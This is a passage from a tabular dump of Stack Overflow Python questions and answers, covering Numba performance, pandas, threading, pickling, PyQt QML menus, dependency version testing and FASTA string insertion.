correctly. Then it will work. | 2 | 1 |
79,570,437 | 2025-4-12 | https://stackoverflow.com/questions/79570437/what-is-the-most-efficient-way-to-get-length-of-path-from-adjacency-matrix-using | The problem I am solving is optimizing a genetic algorithm for the Traveling Salesman Problem. Calculating the path takes the most time. Here is the current code I am working on: from itertools import pairwise import numpy as np from random import shuffle def get_path_len(adj_mat: np.ndarray, path: np.ndarray) -> float: return sum(adj_mat[i, j] for i, j in pairwise(path)) + adj_mat[path[-1], path[0]] mat = np.random.randint(1, 1000, (100, 100)) path = np.asarray(list(range(100))) shuffle(path) print(get_path_len(mat, path)) | Here is an example of how to use Numba to do that efficiently: import numba as nb # Pre-compile the code for a int32/int64 adj_mat 2D array # and a int64 path 1D array @nb.njit(['(int32[:,:], int64[:])', '(int64[:,:], int64[:])']) def get_path_len(adj_mat, path): s = 0 for i in range(path.size-1): # Assume path contains integers less than min(adj_mat.shape) s += adj_mat[path[i], path[i+1]] return s + adj_mat[path[-1], path[0]] Here is performance results on my i5-9600KF CPU and Numpy 2.1.3: Naive unvectorised code: 28.5 µs Numba code: 0.6 µs | 3 | 3 |
79,570,508 | 2025-4-12 | https://stackoverflow.com/questions/79570508/create-boolean-columns-from-string-column | I have column column1 of type string with values like "some1,some2,some3". I need to create boolean columns based on column1 like: some1, some2, some3. For example, I have the dataframe with one column column1: column1 | -------------------+ "some1,some2,some3"| "some2,some3" | "some1" | "some1,some3" | I need to get the dataframe with three boolean columns: some1 | some2 | some3 | ------+-------+-------+ True | True | True | False | True | True | True | False | False | True | False | True | | You can use str.get_dummies + astype: df['column1'].str.get_dummies(sep=',').astype(bool) Output: some1 some2 some3 0 True True True 1 False True True 2 True False False 3 True False True Data used import pandas as pd data = {'column1': ["some1,some2,some3", "some2,some3", "some1", "some1,some3"]} df = pd.DataFrame(data) | 1 | 4 |
79,570,287 | 2025-4-12 | https://stackoverflow.com/questions/79570287/python-3-concurrent-futures-get-thread-number-without-adding-a-function | Currently this code prints, MainThread done at sec 1 MainThread done at sec 1 MainThread done at sec 2 MainThread done at sec 1 MainThread done at sec 0 MainThread done at sec 3 MainThread done at sec 2 MainThread done at sec 5 MainThread done at sec 4 I need it to print MainThread 1 done at sec 1 MainThread 3 done at sec 1 MainThread 2 done at sec 2 MainThread 3 done at sec 1 MainThread 1 done at sec 0 MainThread 2 done at sec 3 MainThread 2 done at sec 2 MainThread 3 done at sec 5 MainThread 1 done at sec 4 How can I do this, by modifying this 1 line of code. print(threading.current_thread().name + ' done at sec ' + str(future.result())) Here is the full code import concurrent.futures import threading import pdb import time import random def Threads2(time_sleep): time.sleep(time_sleep) return time_sleep all_sections = [random.randint(0, 5) for iii in range(10)] test1 = [] with concurrent.futures.ThreadPoolExecutor(max_workers=3, thread_name_prefix="Ok") as executor: working_threads = {executor.submit(Threads2, time_sleep): time_sleep for index, time_sleep in enumerate(all_sections)} for future in concurrent.futures.as_completed(working_threads): print(threading.current_thread().name + ' done at sec ' + str(future.result())) | future doesn't know which thread ran the function, you need to store that yourself. you can wrap the functor in a wrapper that will return whatever you want from the executing thread. import concurrent.futures import threading import pdb import time import random from functools import wraps def wrap_function(func): @wraps(func) def wrapper_functor(*args, **kwargs): return (threading.current_thread().name, threading.current_thread().ident, func(*args, **kwargs)) # calls the wrapped function return wrapper_functor # return a functor that wraps the function def Threads2(time_sleep): time.sleep(time_sleep) return time_sleep all_sections = [random.randint(0, 5) for iii in range(10)] test1 = [] with concurrent.futures.ThreadPoolExecutor( max_workers=3, thread_name_prefix="Ok") as executor: working_threads = { executor.submit(wrap_function(Threads2), time_sleep): time_sleep for index, time_sleep in enumerate(all_sections)} for future in concurrent.futures.as_completed(working_threads): thread_name, thread_id, result = future.result() print(thread_name, thread_id, 'done at sec', str(result)) Ok_0 18532 done at sec 0 Ok_2 12424 done at sec 1 Ok_0 18532 done at sec 3 Ok_2 12424 done at sec 2 Ok_1 19356 done at sec 4 Ok_0 18532 done at sec 4 Ok_1 19356 done at sec 3 Ok_2 12424 done at sec 4 Ok_0 18532 done at sec 3 Ok_1 19356 done at sec 4 if you want just 0,1,2 then you can use thread_name.split('_')[-1] a super compressed form to do this with a lambda (which shouldn't pass a code review) is working_threads = { executor.submit(lambda *args, **kwargs: ( threading.current_thread().name, threading.current_thread().ident, Threads2(*args, **kwargs)), time_sleep): time_sleep for index, time_sleep in enumerate(all_sections)} | 2 | 1 |
79,570,163 | 2025-4-12 | https://stackoverflow.com/questions/79570163/why-do-these-nearly-identical-functions-perform-very-differently | I have written four functions that modify a square 2D array in place, it reflects half of the square array delimited by two sides that meet and the corresponding 45 degree diagonal, to the other half separated by the same diagonal. I have written a function for each of the four possible cases, to reflect product(('upper', 'lower'), ('left', 'right')) to product(('lower', 'upper'), ('right', 'left')). They use Numba to compile Just-In-Time and they are parallelized using numba.prange and are therefore much faster than the methods provided by NumPy: In [2]: sqr = np.random.randint(0, 256, (1000, 1000), dtype=np.uint8) In [3]: %timeit x, y = np.tril_indices(1000); sqr[x, y] = sqr[y, x] 9.16 ms ± 30.9 μs per loop (mean ± std. dev. of 7 runs, 100 loops each) As you can see, the above code takes a very long time to execute. import numpy as np import numba as nb @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_LL2UR(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") for i in nb.prange(height): arr[i, i:] = arr[i:, i] @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_UR2LL(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") for i in nb.prange(height): arr[i:, i] = arr[i, i:] @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_LR2UL(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") last = height - 1 for i in nb.prange(height): arr[i, last - i :: -1] = arr[i:, last - i] @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_UL2LR(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") last = height - 1 for i in nb.prange(height): arr[i:, last - i] = arr[i, last - i :: -1] In [4]: triangle_flip_LL2UR(sqr) In [5]: triangle_flip_UR2LL(sqr) In [6]: triangle_flip_LR2UL(sqr) In [7]: triangle_flip_UL2LR(sqr) In [8]: %timeit triangle_flip_LL2UR(sqr) 194 μs ± 634 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [9]: %timeit triangle_flip_UR2LL(sqr) 488 μs ± 3.26 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [10]: %timeit triangle_flip_LR2UL(sqr) 196 μs ± 501 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [11]: %timeit triangle_flip_UL2LR(sqr) 486 μs ± 855 ns per loop (mean ± std. dev. of 7 runs, 1,000 loops each) Why do they have execution times with a significant difference? Two of them take around 200 microseconds to execute, the other two around 500 microseconds, despite the fact that they are almost identical. I have discovered something. triangle_flip_UR2LL(arr) is the same as triangle_flip_LL2UR(sqr.T) and vice versa. Now if I transpose the array before calling the functions, the trend of performance is reversed: In [109]: %timeit triangle_flip_UR2LL(sqr.T) 196 μs ± 1.15 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [110]: %timeit triangle_flip_LL2UR(sqr.T) 490 μs ± 1.24 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) Why is this happening? | this is a mixture of false sharing and memory bandwidth bottleneck, removing the parallelization by converting nb.prange -> range you get equal times for all 4 functions. the first one is writing a single row at a time, which is contiguous in memory, the second one is writing a column at a time. this column is not contiguous. the computer doesn't work with bytes, it works with cache lines, a cache line is a contiguous 64 bytes of memory on most systems. when a thread writes to a cache line it marks the entire cache line dirty and other threads need to refresh their version of that dirty cache line before they read or write to the other values in it. this is basically false sharing. In the second version, as each thread is writing a column at a time, it is marking many cache lines dirty at a time, thus stepping over other threads that will try to read from it. lastly i need to point out that parallelizing this code introduces race conditions in all versions, you need to have separate arrays for input and output, or have each thread work on a square block at a time instead of an entire row or column, most optimized implementations of matrix transpose avoid this false sharing by doing that. | 2 | 4 |
79,569,792 | 2025-4-11 | https://stackoverflow.com/questions/79569792/pickle-works-but-fails-pytest | I've created a module persist containing a function obj_pickle which I'm using to pickle various objects in my project. It work fine but it's failing pytest, returning; > pickle.dump(obj, file_handle, protocol=protocol) E AttributeError: Can't pickle local object 'test_object.<locals>.TestObject' Running: python 3.12 pytest Version: 8.3.5 I see that the are similar looking issues tied to multiprocessing but I don't think pytest is exposing that issue. Code below, and many thanks. # lib.persist.py from pathlib import Path import pickle def obj_pickle(obj: object, dir:Path, protocol: int = pickle.HIGHEST_PROTOCOL) -> None: """ Pickle an object to a byte file. """ if not dir.exists(): dir.mkdir(parents=True, exist_ok=True) path = Path(dir, obj.instance_name + '.pkl') with open(path, "wb") as file_handle: pickle.dump(obj, file_handle, protocol=protocol) print(f"{obj.__class__.__name__} object {obj.instance_name} saved to {path}") # tests.test_persist.py from pathlib import Path import pytest from lib.persist import obj_pickle TEST_DIR = Path("test_dir") @pytest.fixture def test_object(): class TestObject(): def __init__(self, instance_file_name): self.instance_file_name = instance_file_name self.data = "This is a test object." test_object = TestObject("test_object_file") return test_object def test_obj_pickle(test_object): obj_pickle(test_object, Path(TEST_DIR)) path = Path(TEST_DIR, "test_object_file" + ".pkl") assert path.exists() | This doesn't really have anything to do with pytest. When you load an object from a pickle, the pickle machinery needs to know what the class of that object should be. But if you define a class inside a function, then every execution of that function generates a whole new class. pickle has no way to tell which version of the class to use, if any versions even exist in the Python session in which you're loading the pickle. Instead of trying to make it work, and creating a pile of weird inconsistencies and edge cases, pickle just doesn't support pickling instances of classes like that. You need to move your class definition out of the function you have it in: class TestObject: def __init__(self, instance_file_name): self.instance_file_name = instance_file_name self.data = "This is a test object." @pytest.fixture def test_object(): return TestObject("test_object_file") | 1 | 2 |
79,568,766 | 2025-4-11 | https://stackoverflow.com/questions/79568766/pyqt6-on-windows-qtquickcontrols2windowsstyleimplplugin-dll-the-specified-mod | i am trying to test some code using PyQt6. When I try to display en MenuBar in my main.qml, i have this error : QQmlApplicationEngine failed to load component file:///C:/Users/[blablabla]/GUIt/main.qml:11:9: Type Menu unavailable qrc:/qt-project.org/imports/QtQuick/Controls/Windows/Menu.qml:32:15: Type MenuItem unavailable qrc:/qt-project.org/imports/QtQuick/Controls/Windows/MenuItem.qml:7:1: Impossible de charger la bibliothÞque C:\Users\[blablabla]\Python\Python313\Lib\site-packages\PyQt6\Qt6\qml\QtQuick\Controls\Windows\impl\qtquickcontrols2windowsstyleimplplugin.dllá: Le module spÚcifiÚ est introuvable. (Sorry i'm french so my errors too, but "Le module spÚcifiÚ est introuvable." means "The specified module could not be found") I could not find any solved issue similar to my problem so i try my luck here. I am on Windows 11, and I am using Python3.13.3 (not the native Windows installation) Here is my code : main.py : from PyQt6.QtWidgets import QApplication from PyQt6.QtQml import QQmlApplicationEngine from backend import Backend app = QApplication([]) engine = QQmlApplicationEngine() backend = Backend() engine.rootContext().setContextProperty("pybackend", backend) engine.load("main.qml") if not engine.rootObjects(): import sys sys.exit(-1) app.exec() backend.py : from PyQt6.QtCore import QObject, pyqtSlot, pyqtProperty, pyqtSignal from PyQt6.QtWidgets import QFileDialog from git import Repo from models.CommitList import CommitListModel class Backend(QObject): repoPathChanged = pyqtSignal() repoNameChanged = pyqtSignal() commitListChanged = pyqtSignal() def __init__(self): super().__init__() self._commit_list = CommitListModel() self._repo_path = "" self.repo = None self._repo_name = "" @pyqtProperty(str, notify=repoPathChanged) def repoPath(self): return self._repo_path @pyqtProperty(str, notify=repoNameChanged) def repoName(self): return self._repo_name @pyqtProperty(QObject, notify=commitListChanged) def commitList(self): return self._commit_list @pyqtSlot() def chooseAndLoadRepo(self): dialog = QFileDialog() dialog.setFileMode(QFileDialog.FileMode.Directory) dialog.setOption(QFileDialog.Option.ShowDirsOnly, True) if dialog.exec(): selected_dirs = dialog.selectedFiles() if selected_dirs: self.loadRepo(selected_dirs[0]) # charge le dossier sélectionné @pyqtSlot() def loadRepo(self, path = "C:/Users/lucie/Hesias/B2/MajorProject/major-project-b2"): try: self.repo = Repo(path) self._repo_path = path self._repo_name = path.split("/")[-1] self.repoPathChanged.emit() self.repoNameChanged.emit() except Exception as e: print(f"Erreur : {e}") @pyqtSlot() def loadCommits(self): try: commits = [f"{c.hexsha[:7]}: {c.summary}" for c in self.repo.iter_commits()] print(commits) self._commit_list.setCommits(commits) self.commitListChanged.emit() except Exception as e: self._commit_list.setCommits([f"Erreur : {e}"]) models/CommitList.py : from PyQt6.QtCore import QAbstractListModel, Qt, QModelIndex class CommitListModel(QAbstractListModel): def __init__(self, commits=None): super().__init__() self._commits = commits or [] def data(self, index, role): if role == Qt.ItemDataRole.DisplayRole and index.isValid(): return self._commits[index.row()] return None def rowCount(self, index): return len(self._commits) def setCommits(self, commits): self.beginResetModel() self._commits = commits self.endResetModel() main.qml : import QtQuick import QtQuick.Controls ApplicationWindow { visible: true width: 640 height: 480 title: qsTr("GUIt") MenuBar { Menu { title: "Fichier" Action { text: "Charger un dépôt" onTriggered: pybackend.chooseAndLoadRepo() } // Tu peux ajouter plus d'actions ici // Action { // text: "Autre option" // onTriggered: { /* action ici */ } // } } // Ajoute un menu "Édition" Menu { title: "Édition" Action { text: "Option 1" onTriggered: { /* action ici */ } } Action { text: "Option 2" onTriggered: { /* action ici */ } } } } Column { anchors.centerIn: parent spacing: 10 Text { text: pybackend.repoPath !== "" ? "Repo actuel : " + pybackend.repoName : "Aucun dépôt chargé" font.pixelSize: 20 } Button { text: "Charger le dépôt" // onClicked: pybackend.loadRepo() onClicked: pybackend.chooseAndLoadRepo() } Button { text: "Charger les commits" onClicked: pybackend.loadCommits() enabled: pybackend.repoPath !== "" } ListView { width: parent.width height: 300 model: pybackend.commitList delegate: Text { text: model.display // ou juste `modelData` si le rôle par défaut est utilisé font.pixelSize: 14 padding: 4 } } } } | The last version of QtQuick.Controls which supports a natively rendered Windows MenuBar was version 1.4. Unfortunately, for your current code, QtQuick.Controls available with PyQt6 is version 2. In order to use QtQuick.Controls 1.4, you have to use PyQt5. Use PyQt5 instead of PyQt6 in main.py, backend.py, and CommitList.py. Then, in your main.qml file, specify the QtQuick and QtQuick.Controls versions as show in the code below. In the second menu item, I changed "Action" to "MenuItem", because I'm guessing that is what you really intended. The menu bar should be specified as: menuBar: MenuBar { Also, "padding: 4" is not supported with the above changes. I've marked all of the lines that I changed in main.qml with "// CHANGED". import QtQuick 2.5 // CHANGED import QtQuick.Controls 1.4 // CHANGED ApplicationWindow { visible: true width: 640 height: 480 title: qsTr("GUIt") menuBar: MenuBar { // CHANGED Menu { title: "Fichier" Action { text: "Charger un dépôt" onTriggered: pybackend.chooseAndLoadRepo() } // Tu peux ajouter plus d actions ici // Action { // text: "Autre option" // onTriggered: { /* action ici */ } // } } // Ajoute un menu "Édition" Menu { title: "Édition" MenuItem { // CHANGED text: "Option 1" onTriggered: { /* action ici */ } } MenuItem { // CHANGED text: "Option 2" onTriggered: { /* action ici */ } } } } Column { anchors.centerIn: parent spacing: 10 Text { text: pybackend.repoPath !== "" ? "Repo actuel : " + pybackend.repoName : "Aucun dépôt chargé" font.pixelSize: 20 } Button { text: "Charger le dépôt" // onClicked: pybackend.loadRepo() onClicked: pybackend.chooseAndLoadRepo() } Button { text: "Charger les commits" onClicked: pybackend.loadCommits() enabled: pybackend.repoPath !== "" } ListView { width: parent.width height: 300 model: pybackend.commitList delegate: Text { text: model.display // ou juste `modelData` si le rôle par défaut est utilisé font.pixelSize: 14 // padding: 4 // CHANGED } } } } | 2 | 1 |
79,569,422 | 2025-4-11 | https://stackoverflow.com/questions/79569422/how-to-check-range-of-versions | I have a build_requirments_file.py file, which builds a requirments.txt file for a given python program, but the thing is... It creates something like: huggingface_hub==currently installed version\ pynput==currently installed version\ module==current version But, how will I know in which "range" of versions will my code/programme work? For example, how will I generate something like: hugginface_hub>=versionx.x.x OR pynput<=versionx.x.x OR\ pynput>versionx.x.x but <versionx.x.x (This means greater than versionx.x.x but less than versionx.x.x) For that we usually need to install and test all versions of the requirements.......... I don't want to test so much, you need a whole team for testing, but what if you're just one-man-army?? | Unfortunately there is no nice and clean way to actually do this. Why is that the case? Very time a package gets an updated version, all that really means is that its source code is in some way different. The more utility of the package that you use the more potential sensitivity you may have to different versions of the package. To further complicate this many package often have dependencies on other packages, that may mean that your code by itself may not be super sensitive to different versions of each package, but the functions you are knowingly or unknowingly invoking might actually be more sensitive to the versions of the packages it relies on than your own code itself! To answer your question, here are three ways to ascertain the version ranges: 1: RTFM; take a look at your code and see exactly which functions you are using from each package and look those functions up on the package's website. Most of the larger packages will keep change logs for each version and you should be able to see when the function you are using was introduced and if its signature has changed at some point. This method is relatively fast but has 2 drawbacks: your package might rely on compiled code from another language you do not know and thus cannot confidently ascertain, and not all packages have great change logs or even documentation so just because information is or is not present does not give you 100% confidence that something is working. 2: Test it yourself; the way to truly know the package versions that are acceptable for your code is if you test each one out by hand. This takes a while to do but I will share some tricks that I use to speed this up: i) create a text file where you dump the package versions of successful tests (eg good_versions.txt) ii) create a new python file (eg version_range_test.py) that follows some flow like # version_range_test.py # packages you need import required_package_1 import required_package_2 ... import required_package_n # import yours import my_module # run your module to see if it crashes with each version result = my_module.my_main_func(...) # record the expected resulting data structure into this file expected_result = ... # assert that the result and the expected result are identical assert(result, expected_result) # make a list of all of the packages that you need and their versions package_version_list = [ f'required_package_1=={required_package_1.__version__}', ..., f'required_package_1=={required_package_n.__version__}', ] # write this package list to your file with open ('good_versions.txt', ...) as f: # add whatever formatting you want here package_version_list = ... # save this f.write(package_version_list, ...) Running the file in this way will first test that that your code (a) does not crash with the tested versions and (b) that the tested versions will produce the results you want them to. You can test a bunch of variations of inputs if you are concerned about edge cases. If either of these does not happen then your code will crash before it is able to write out the good versions. If you want to automate the reviewing of this file you can write out json data to a json file instead of writing out text to a text file. iii) write a small bash command that you will copy and paste, this command will do 3 things in the following order... uninstall current package versions; install new package versions; run version_range_test.py file. The pseudo-code for this will look something like uninstall old versions: /path/to/python.exe -m uninstall package required_package_1; /path/to/python.exe -m uninstall package required_package_n; install new versions, the version numbers here are the only thing you need to edit when testing: /path/to/python.exe -m install package required_package_1==#; /path/to/python.exe -m install package required_package_n==#; run your code: /path/to/python.exe /path/to/version_range_test.py Putting this all together into a single line to edit: /path/to/python.exe -m uninstall package required_package_1; /path/to/python.exe -m uninstall package required_package_n; /path/to/python.exe -m install package required_package_1==#; /path/to/python.exe -m install package required_package_n==#; /path/to/python.exe /path/to/version_range_test.py You can either edit the version numbers by hand for every single test or write it all in a bash loop, if you do the bash loop then make sure that it will not exit if your test file crashes. iv) After you have ran all of your tests then go review the good_versions.txt file. If you have made it a text file you can just go look for the test that yielded the minimum and maximum versions. If you have made this a json file you can automate the searching of these much easier since it is already parseable. The automation of this can be done in a boiler plate python file. 3: Do both; you can RTFM to get a good idea of what versions you might want to start testing around, and then move onto only testing the versions you think may prove to be more sensitive in order to confirm. This reduces the testing time a lot. Hope this helps! Edit: Forgot to mention full scale automation of this: You can automate everything described above in either a python or bash file, if you see this being a regular occurrence. For this purpose it would make more sense to save this the successful version tests into json format since it is already parseable, rather than writing your own text parser. Here is the pseudo code for what the python file (eg version_ranges_automation.py) would look like: # version_ranges_automation.py ; example of how to automate all of the above import itertools import json import subprocess python_interpreters = ['/path/to/python_a.exe', '/path/to/python_b.exe', ...] package_names = ['required_package_1', ..., 'required_package_n',] versions_lists = [['#1_1', '1_#2'... ], ... ['#n_1', 'n_#2'... ],] test_filepath = "/path/to/version_range_test.py" results_filepath = "/path/to/good_versions.json" # concat the interpreters and package versions all_combos = [python_interpreters] + versions_lists # get a list of all the permutations of each interpreter and package version: all_version_permutations = list(itertools.product(*all_combos)) # since the uninstall string is always the same it can be established here, if you are testing variations of python interpreters this will need to be placed here via the lambda function. since the interp is the first part of the list it is just pulled out here uninstall_str_func = lambda x: "; ".join(f"{x[0]} uninstall {i} for i in package_names") # you can initialize the install string as an anon function to save time making it in each loop, the package names and versions align so only the versions need to be pulled in, via x. This needs the interpreter names and versions install_str_func = lambda x: "; ".join(f"{x[0]} install {i}=={j}" for i,j in zip(package_names, x[1:])) # lastly you can make an anon function to run your test file: run_test_str_func = lambda x: "; ".join(f"{x[0]} {test_filepath}") # loop through all permutations for i in all_version_permutations: # construct the bash string for this specitic loop iteration tmp_bash_str = "; ".join(x(i) for x in [ uninstall_str_func, install_str_func, run_test_str_func]) # run the test, use a try expect statement just in case, if you want to try: subprocess.call(tmp_bash_str) except: contine # now that the good_versions.json file is complete it can be read in here. There is no best way to format it or define minimum and maximum ranges across a wide array of versions of multipe packages and interpreters. Feel free to use your own heuristics results = json.load(results_filepath) ... | 2 | 3 |
79,568,360 | 2025-4-11 | https://stackoverflow.com/questions/79568360/determine-position-of-an-inserted-string-within-another | Following this post I managed to put together a small function to place within a bigger text body (FASTA) shorter strings determined from another file based on some conditions (e.g. 100 events from a subset of only those 400-to-500 characters in length, and selected randomly). Now, I'm pretty fine with the result; however, I wish to print for those 100 events where exactly they have been added in the bigger text body — ideally, start-end position if not too hard. I guess this could be integrated in get_retro_text() or, if easier, build as an external function, but I cannot really figure out from where to start... any help is greatly appreciated, thanks in advance! ###library import from Bio import SeqIO import random ###string import and wrangling input_file = open("homo_sapiens_strings.fasta.txt") my_dict = SeqIO.to_dict(SeqIO.parse(input_file, "fasta")) s = [] for j in my_dict.values(): s.append(j) ###import FASTA --> some already made function I found to import and print whole FASTA genomes but testing on a part of it def fasta_reader(filename): from Bio.SeqIO.FastaIO import FastaIterator with open(filename) as handle: for record in FastaIterator(handle): yield record head = "" body = "" for entry in fasta_reader("hg37_chr1.fna"): head = str(entry.id) body = str(entry.seq) ###randomly selects 100 sequences and adds them to the FASTA def insert (source_str, insert_str, pos): return source_str[:pos] + insert_str + source_str[pos:] def get_retro_text(genome, all_strings): string_of_choice = [string for string in all_strings if 400 < len(string) < 500] hundred_strings = random.sample(string_of_choice, k=100) text_of_strings = [] for k in range(len(hundred_strings)): text_of_strings.append(str(hundred_strings[k].seq)) single_string = ",".join(text_of_strings) new_genome = insert(genome, single_string, random.randint(0, len(genome))) return new_genome big_genome = get_retro_text(body, s) EDIT example of structure of body and s body NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtaaccctaaccctaacccta accctaaccctaaccctaaccctaaccctaaccctaaccctaaccctaaccctaacccta accctaaccctaaccctaaccctaacccaaccctaaccctaaccctaaccctaaccctaa ccctaacccctaaccctaaccctaaccctaaccctaacctaaccctaaccctaaccctaa ccctaaccctaaccctaaccctaaccctaacccctaaccctaaccctaaaccctaaaccc taaccctaaccctaaccctaaccctaaccccaaccccaaccccaaccccaaccccaaccc caaccctaacccctaaccctaaccctaaccctaccctaaccctaaccctaaccctaaccc taaccctaacccctaacccctaaccctaaccctaaccctaaccctaaccctaaccctaac ccctaaccctaaccctaaccctaaccctcgCGGTACCCTCAGCCGGCCCGCCCGCCCGGG TCTGACCTGAGGAGAACTGTGCTCCGCCTTCAGAGTACCACCGAAATCTGTGCAGAGGAc aacgcagctccgccctcgcggtGCTCtccgggtctgtgctgaggagaacgCAACTCCGCC GTTGCAAAGGCGcgccgcgccggcgcaggcgcagagaggcgcgccgcgccggcgcaggcg cagagaggcgcgccgcgccggcgcaggcgcagagaggcgcgccgcgccggcgcaggcgca gagaggcgcgccgcgccggcgcaggcgcagagaggcgcgccgcgccggcgcaggcgcaga caCATGCTAGCGCGTCGGGGTGGAGGCgtggcgcaggcgcagagaggcgcgccgcgccgg cgcaggcgcagagacaCATGCTACCGCGTCCAGGGGTGGAGGCgtggcgcaggcgcagag aggcgcaccgcgccggcgcaggcgcagagacaCATGCTAGCGCGTCCAGGGGTGGAGGCG TggcgcaggcgcagagacgcAAGCCTAcgggcgggggttgggggggcgTGTGTTGCAGGA GCAAAGTCGCACGGCGCCGGGCTGGGGCGGGGGGAGGGTGGCGCCGTGCACGCGCAGAAA CTCACGTCACGGTGGCGCGGCGCAGAGACGGGTAGAACCTCAGTAATCCGAAAAGCCGGG ATCGACCGCCCCTTGCTTGCAGCCGGGCACTACAGGACCCGCTTGCTCACGGTGCTGTGC CAGGGCGCCCCCTGCTGGCGACTAGGGCAACTGCAGGGCTCTCTTGCTTAGAGTGGTGGC CAGCGCCCCCTGCTGGCGCCGGGGCACTGCAGGGCCCTCTTGCTTACTGTATAGTGGTGG CACGCCGCCTGCTGGCAGCTAGGGACATTGCAGGGTCCTCTTGCTCAAGGTGTAGTGGCA GCACGCCCACCTGCTGGCAGCTGGGGACACTGCCGGGCCCTCTTGCTCCAACAGTACTGG CGGATTATAGGGAAACACCCGGAGCATATGCTGTTTGGTCTCAGTAGACTCCTAAATATG GGATTCCTgggtttaaaagtaaaaaataaatatgtttaatttgtGAACTGATTACCATCA GAATTGTACTGTTCTGTATCCCACCAGCAATGTCTAGGAATGCCTGTTTCTCCACAAAGT GTTtacttttggatttttgccagTCTAACAGGTGAAGCCCTGGAGATTCTTATTAGTGAT TTGGGCTGGGGCCTGgccatgtgtatttttttaaatttccactgaTGATTTTGCTGCATG GCCGGTGTTGAGAATGACTGCGCAAATTTGCCGGATTTCCTTTGCTGTTCCTGCATGTAG TTTAAACGAGATTGCCAGCACCGGGTATCATTCACCATTTTTCTTTTCGTTAACTTGCCG TCAGCCTTTTCTTTGACCTCTTCTTTCTGTTCATGTGTATTTGCTGTCTCTTAGCCCAGA CTTCCCGTGTCCTTTCCACCGGGCCTTTGAGAGGTCACAGGGTCTTGATGCTGTGGTCTT CATCTGCAGGTGTCTGACTTCCAGCAACTGCTGGCCTGTGCCAGGGTGCAAGCTGAGCAC TGGAGTGGAGTTTTCCTGTGGAGAGGAGCCATGCCTAGAGTGGGATGGGCCATTGTTCAT s [[SeqRecord(seq=Seq('ATGGCGGGACACCCGAAAGAGAGGGTGGTCACAGATGAGGTCCATCAGAACCAG...TAG'), id='retro_hsap_1', name='retro_hsap_1', description='retro_hsap_1', dbxrefs=[]), SeqRecord(seq=Seq('ATGGTCAACGTACCTAAAACCCGAAGAACCTTCTGTAAGAAGTGTGGCAAGCAT...TAA'), id='retro_hsap_2', name='retro_hsap_2', description='retro_hsap_2', dbxrefs=[]), SeqRecord(seq=Seq('ATGTCCACAATGGGAAACGAGGCCAGTTACCCGGCGGAGATGTGCTCCCACTTT...TGA'), id='retro_hsap_3', name='retro_hsap_3', description='retro_hsap_3', dbxrefs=[])]] | Your current code has some issues: It inserts the 100 randomly selected strings all adjacent to eachother in the genome The 100 strings are concatenated with commas, which end up in the final gnome string So that would need to be fixed first before getting to the question of the positions where the insertions happen. I would tackle these issues as follows. I have placed comments where I changed the code import random # removed the insert function: will not be used def get_retro_text(genome, all_strings): string_of_choice = [string for string in all_strings if 400 < len(string) < 500] hundred_strings = random.sample(string_of_choice, k=100) # get a sorted list of randomly selected insertion points in the genome indices = sorted(random.randrange(len(genome)) for _ in hundred_strings) # get a list sub strings that result from slicing up the genome at the random insertion points slices = [genome[i:j] for i, j in zip([0] + indices, indices + [len(genome)])] # determine what the offsets will be once the selected strings are inserted into the genome start = 0 offsets = [(start := start + len(infix), start := start + len(string)) for infix, string in zip(slices, hundred_strings)] # finally build the new genome by alternating the slices (substrings) with the strings to insert new_genome = "".join("".join(pairs) for pairs in zip(slices, hundred_strings)) + slices[-1] # return both the new genome and the information of where insertions were made return new_genome, offsets # if you have items with a seq attribute, then extract that first: s = [str(item.seq) for item in s] # get both the genome and the information about the insertion points big_genome, offsets = get_retro_text(body, s) print(big_genome) print(offsets) | 1 | 1 |
79,568,961 | 2025-4-11 | https://stackoverflow.com/questions/79568961/why-does-this-fast-function-with-numba-jit-slow-down-if-i-jit-compile-another-fu | So I have this function: import numpy as np import numba as nb @nb.njit(cache=True, parallel=True, nogil=True) def triangle_half_UR_LL(size: int, swap: bool = False) -> tuple[np.ndarray, np.ndarray]: total = (size + 1) * size // 2 x_coords = np.full(total, 0, dtype=np.uint16) y_coords = np.full(total, 0, dtype=np.uint16) offset = 0 side = np.arange(size, dtype=np.uint16) for i in nb.prange(size): offset = i * size - (i - 1) * i // 2 end = offset + size - i x_coords[offset:end] = i y_coords[offset:end] = side[i:] return (x_coords, y_coords) if not swap else (y_coords, x_coords) What it does is not important, the point is it is JIT compiled with Numba and therefore very fast: In [2]: triangle_half_UR_LL(10) Out[2]: (array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 8, 8, 9], dtype=uint16), array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 2, 3, 4, 5, 6, 7, 8, 9, 3, 4, 5, 6, 7, 8, 9, 4, 5, 6, 7, 8, 9, 5, 6, 7, 8, 9, 6, 7, 8, 9, 7, 8, 9, 8, 9, 9], dtype=uint16)) In [3]: %timeit triangle_half_UR_LL(1000) 166 μs ± 489 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [4]: %timeit triangle_half_UR_LL(1000) 166 μs ± 270 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [5]: %timeit triangle_half_UR_LL(1000) 166 μs ± 506 ns per loop (mean ± std. 